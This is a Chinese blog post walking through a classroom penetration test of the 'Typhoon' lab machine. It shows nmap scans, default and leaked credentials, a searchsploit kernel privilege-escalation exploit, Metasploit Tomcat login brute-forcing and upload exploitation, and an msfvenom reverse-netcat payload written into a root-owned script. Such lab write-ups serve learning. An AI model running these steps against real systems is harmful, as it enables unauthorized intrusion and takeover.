<!DOCTYPE HTML>
<html lang="zh-CN">
<head>
    

<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="keywords" content="对Typhoon的一次入侵, pgg,信息安全，小白教程，情感博主">
    <meta name="description" content="对Typhoon的一次入侵老师开了搭建了一个网站让我们尝试入侵  Ip为：192.168.0.159 ，首先我先访问看看

1.  首先看到这个网站，我习惯性的是先扫描一下它的目录 ，再扫描一下它的端口
nmap -sV -p- -A -P">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>对Typhoon的一次入侵 | pgg学长</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/css/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

</head>

<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="container">
            <div class="nav-wrapper">
                <div class="brand-logo">
                    <a href="/" class="waves-effect waves-light">
                        
                        <img src="/medias/logo.png" class="logo-img hide-on-small-only">
                        
                        <span class="logo-span">pgg学长</span>
                    </a>
                </div>
                
            </div>
        </div>

        
        
        
    </nav>
</header>





<div class="bg-cover post-cover" style="background-image: url('/medias/featureimages/16.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        对Typhoon的一次入侵
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1,
    #articleContent h2,
    #articleContent h3,
    #articleContent h4,
    #articleContent h5,
    #articleContent h6 {
        padding-top: 76px;
        margin-top: -76px;
    }

    #articleContent h1 {
        line-height: 3.5rem;
    }

    #articleContent h2 {
        line-height: 3.2rem;
    }

    #articleContent h3 {
        line-height: 2.8rem;
    }

    #articleContent h4 {
        line-height: 2.5rem;
    }

    #articleContent h5 {
        line-height: 2.2rem;
    }

    #articleContent h6 {
        line-height: 1.9rem;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
</style>
<div class="row">
    <div class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            
            <div class="post-info">
                

                <span class="post-date">
                    <i class="fa fa-clock-o fa-fw"></i>2019-05-20
                </span>
            </div>
        </div>
        <hr>
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="对Typhoon的一次入侵"><a href="#对Typhoon的一次入侵" class="headerlink" title="对Typhoon的一次入侵"></a>对Typhoon的一次入侵</h1><p><em>老师开了搭建了一个网站让我们尝试入侵  Ip为：192.168.0.159 ，首先我先访问看看</em></p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/1.png"></p>
<h4 id="1-首先看到这个网站，我习惯性的是先扫描一下它的目录-，再扫描一下它的端口"><a href="#1-首先看到这个网站，我习惯性的是先扫描一下它的目录-，再扫描一下它的端口" class="headerlink" title="1.  首先看到这个网站，我习惯性的是先扫描一下它的目录 ，再扫描一下它的端口"></a>1.  首先看到这个网站，我习惯性的是先扫描一下它的目录 ，再扫描一下它的端口</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image2.png"></p>
<p>nmap -sV -p- -A -Pn    </p>
<p>nmap -sS -sV -A –O</p>
<p>nmap –A  </p>
<p>21(ftp),</p>
<p>· 22(ssh),</p>
<p>· 25(smtp),</p>
<p>· 53(domain),</p>
<p>· 80(http),</p>
<p>· 110(pop3)</p>
<p>· 111(rpcbind)</p>
<p>· 139(netbios-ssn)</p>
<p>· 143(imap)</p>
<p>· 445(netbios-ssn)</p>
<p>· 631(ipp)</p>
<p>· 993(ssl/imaps),</p>
<p>· 995(ssl/pop3)</p>
<p>· 2049(nfs_acl)</p>
<p>· 3306(mysql),</p>
<p>· 5432(postgrespl)</p>
<p>· 8080(http)</p>
<p>如图：</p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image3.png"></p>
<p>在图中，可以看到robots.txt文件中/monoadmin这个目录禁止访问，这个目录可能会有用。我们还注意到8080端口也开放了，对应的服务是Apache Tomcat，使用的引擎是Coyote JSP engine1.1。这可能是另外一种渗透靶机的方法，我们一会儿再来看看。</p>
<h4 id="2-发现有个robots-txt目录-我们去访问看看"><a href="#2-发现有个robots-txt目录-我们去访问看看" class="headerlink" title="2.  发现有个robots.txt目录 我们去访问看看"></a>2.  发现有个robots.txt目录 我们去访问看看</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image4.png"></p>
<h4 id="3-有个目录，我们去访问看看"><a href="#3-有个目录，我们去访问看看" class="headerlink" title="3.   有个目录，我们去访问看看"></a>3.   有个目录，我们去访问看看</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image5.png"></p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image6.png"></p>
<h4 id="4-这里我们设置-change-database为credentials-84mb-，它会显示2个凭证的链接，我们点击一下这个链接，竟然显示出了用户名和密码，用户名是typhoon，密码是78945"><a href="#4-这里我们设置-change-database为credentials-84mb-，它会显示2个凭证的链接，我们点击一下这个链接，竟然显示出了用户名和密码，用户名是typhoon，密码是78945" class="headerlink" title="4.这里我们设置 change database为credentials(84mb)，它会显示2个凭证的链接，我们点击一下这个链接，竟然显示出了用户名和密码，用户名是typhoon，密码是78945"></a>4.这里我们设置 change database为credentials(84mb)，它会显示2个凭证的链接，我们点击一下这个链接，竟然显示出了用户名和密码，用户名是typhoon，密码是78945</h4><h4 id="5-开放了22端口，那我们就用ssh试试"><a href="#5-开放了22端口，那我们就用ssh试试" class="headerlink" title="5. 开放了22端口，那我们就用ssh试试"></a>5. 开放了22端口，那我们就用ssh试试</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image7.png"></p>
<h4 id="6-登录上来了，我们现在发现它的操作系统是Ubuntu-14-04-我们现在用searchsploit-搜索一下Ubuntu的提权exp"><a href="#6-登录上来了，我们现在发现它的操作系统是Ubuntu-14-04-我们现在用searchsploit-搜索一下Ubuntu的提权exp" class="headerlink" title="6.  登录上来了，我们现在发现它的操作系统是Ubuntu 14.04   我们现在用searchsploit 搜索一下Ubuntu的提权exp"></a>6.  登录上来了，我们现在发现它的操作系统是Ubuntu 14.04   我们现在用searchsploit 搜索一下Ubuntu的提权exp</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image8.png"></p>
<h4 id="7-我们随便使用17292-c的exp去打它-先下载到本地kail上-命令：-searchsploit-–m-37292-，然后使用python启动一个服务器，然后靶机进-tmp目录下载-启动服务器命令-：python-–m-SimpleHTTPServer-8000-下载命令-：wget-http-192-168-0-159-37292-c"><a href="#7-我们随便使用17292-c的exp去打它-先下载到本地kail上-命令：-searchsploit-–m-37292-，然后使用python启动一个服务器，然后靶机进-tmp目录下载-启动服务器命令-：python-–m-SimpleHTTPServer-8000-下载命令-：wget-http-192-168-0-159-37292-c" class="headerlink" title="7.  我们随便使用17292.c的exp去打它   先下载到本地kail上  命令： searchsploit –m 37292 ，然后使用python启动一个服务器，然后靶机进 tmp目录下载    启动服务器命令 ：python –m SimpleHTTPServer 8000    下载命令 ：wget http://192.168.0.159/37292.c"></a>7.  我们随便使用17292.c的exp去打它   先下载到本地kail上  命令： searchsploit –m 37292 ，然后使用python启动一个服务器，然后靶机进 tmp目录下载    启动服务器命令 ：python –m SimpleHTTPServer 8000    下载命令 ：wget <a href="http://192.168.0.159/37292.c" target="_blank" rel="noopener">http://192.168.0.159/37292.c</a></h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image9.png"></p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image10.png"></p>
<h4 id="8-编译exp并赋予权限，然后执行，成功提到root"><a href="#8-编译exp并赋予权限，然后执行，成功提到root" class="headerlink" title="8.  编译exp并赋予权限，然后执行，成功提到root"></a>8.  编译exp并赋予权限，然后执行，成功提到root</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image11.png"></p>
<h5 id="发现这个网站并没有那么简单，我们来换几种方式来入侵试试"><a href="#发现这个网站并没有那么简单，我们来换几种方式来入侵试试" class="headerlink" title="发现这个网站并没有那么简单，我们来换几种方式来入侵试试"></a>发现这个网站并没有那么简单，我们来换几种方式来入侵试试</h5><h4 id="1-前面通过扫描知道了8080端口是开放的，而且开放了Apache-Tomcat服务，直接在浏览器中访问8080端口看看，如图"><a href="#1-前面通过扫描知道了8080端口是开放的，而且开放了Apache-Tomcat服务，直接在浏览器中访问8080端口看看，如图" class="headerlink" title="1.  前面通过扫描知道了8080端口是开放的，而且开放了Apache Tomcat服务，直接在浏览器中访问8080端口看看，如图"></a>1.  前面通过扫描知道了8080端口是开放的，而且开放了Apache Tomcat服务，直接在浏览器中访问8080端口看看，如图</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image12.png"></p>
<h4 id="2-发现"><a href="#2-发现" class="headerlink" title="2. 发现"></a>2. 发现</h4><ol>
<li><h4 id="需要登录，于是想用msf测试存在账号密码"><a href="#需要登录，于是想用msf测试存在账号密码" class="headerlink" title="需要登录，于是想用msf测试存在账号密码"></a>需要登录，于是想用msf测试存在账号密码</h4></li>
</ol>
<p>命令：use auxiliary/scanner/http/tomcat_mgr_login</p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image13.png"></p>
<h4 id="3-得到账号密码："><a href="#3-得到账号密码：" class="headerlink" title="3.  得到账号密码："></a>3.  得到账号密码：</h4><h4 id="username-tomcat-password-tomcat-利用mgr-upload漏洞"><a href="#username-tomcat-password-tomcat-利用mgr-upload漏洞" class="headerlink" title="username:tomcat   password:tomcat   利用mgr_upload漏洞"></a>username:tomcat   password:tomcat   利用mgr_upload漏洞</h4><p>命令： use exploit/multi/http/tomcat_mgr_upload</p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image14.png"></p>
<h4 id="4-进来之后发现是一个python-shell"><a href="#4-进来之后发现是一个python-shell" class="headerlink" title="4. 进来之后发现是一个python shell ,"></a>4. 进来之后发现是一个python shell ,</h4><p>使用命令：python –c ‘import pty;pty.spawn(“/bin/bash”)’</p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image15.png"></p>
<h4 id="5-在-tab目录下有一个script-sh文件，所有者是root，并拥有所有权限"><a href="#5-在-tab目录下有一个script-sh文件，所有者是root，并拥有所有权限" class="headerlink" title="5.  在/tab目录下有一个script.sh文件，所有者是root，并拥有所有权限"></a>5.  在/tab目录下有一个script.sh文件，所有者是root，并拥有所有权限</h4><p>我们使用msfcenom来生成一段bash code 插入恶意代码到这个文件中</p>
<p>命令：msfvenom –p cmd/unix/reverse_netcat lhost=192.168.0.159 lport=4455 R</p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image16.png"></p>
<p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image17.png"></p>
<h4 id="6-我们将恶意代码插入到文件中-命令-echo-“xxxxxxxxxxxxxxx”-gt-script-sh"><a href="#6-我们将恶意代码插入到文件中-命令-echo-“xxxxxxxxxxxxxxx”-gt-script-sh" class="headerlink" title="6.  我们将恶意代码插入到文件中 命令  echo “xxxxxxxxxxxxxxx”&gt;script.sh"></a>6.  我们将恶意代码插入到文件中 命令  echo “xxxxxxxxxxxxxxx”&gt;script.sh</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image18.png"></p>
<h4 id="7-执行后，我们去msf里监听就好了-命令：use-exploit-multi-handler"><a href="#7-执行后，我们去msf里监听就好了-命令：use-exploit-multi-handler" class="headerlink" title="7.  执行后，我们去msf里监听就好了  命令：use exploit/multi/handler"></a>7.  执行后，我们去msf里监听就好了  命令：use exploit/multi/handler</h4><p><img src="http://kan.027cgb.com/613977/对Typhoon的一次入侵/image19.png"></p>
<h5 id="sud-u-jens-绝对路径"><a href="#sud-u-jens-绝对路径" class="headerlink" title="sud -u jens  绝对路径"></a>sud -u jens  绝对路径</h5>
            </div>
            <hr>

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff;
        background-color: #22AB38;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff;
        background-color: #019FE8;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a class="reward-link btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs">
                        <li class="tab wechat-tab waves-effect waves-light"><a class="active" href="#wechat">微信</a></li>
                        <li class="tab alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                    </ul>
                    <div id="wechat">
                        <img src="/medias/reward/ddac.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                    <div id="alipay">
                        <img src="/medias/reward/abcd.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('#reward .reward-link').on('click', function () {
            $('#rewardModal').openModal();
        });

        $('#rewardModal .close').on('click', function () {
            $('#rewardModal').closeModal();
        });
    });
</script>
            

            

            <div class="reprint">
                <p>
                    <span class="reprint-tip">转载请注明: </span>
                    <a href="https://pgg666.org" class="b-link-green">pgg学长</a>
                    <i class="fa fa-angle-right fa-lg fa-fw text-color"></i>
                    <a href="/2019/05/20/对Typhoon的一次入侵/" class="b-link-green">对Typhoon的一次入侵</a>
                </p>
            </div>
        </div>
    </div>

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">上一篇</div>
            <div class="card">
                <a href="/2019/05/31/sql注入入门基本语法/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/41.jpg" class="responsive-img" alt="sql注入入门基本语法">
                        
                        <span class="card-title">sql注入入门基本语法</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">sql注入入门基本语法：今日，天下英雄齐聚在此，还有不少是我pgg昔日的好友，你们每次看到我都夸我帅是什么意思。有没有听过一句话“一生二，二生三，三生万物”sql注入里 今天我讲的就是这个一。########################</div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2019-05-31
                        </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            pgg
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">下一篇</div>
            <div class="card">
                <a href="/2019/04/28/入侵提权内网渗透/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/18.jpg" class="responsive-img" alt="入侵提权内网渗透(完整版)">
                        
                        <span class="card-title">入侵提权内网渗透(完整版)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">入侵提权内网渗透(完整版)​              #注：这次靶机测试，我搞了两天，被靶机秀成了麻瓜，接下来我带领大家领略入侵的快感，当然，你们会看的头皮发麻  哈哈
​         亲爱的老师给了我们一个ip  192.168.0</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-04-28
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            pgg
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>
    </div>
    <div class="col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title">目录</div>
            <div id="toc-content">

            </div>
        </div>
    </div>
</div>

<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });
    });
</script>
    

</main>




<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title">搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字" class="search-input" autofocus>
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/js/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->


</body>
</html>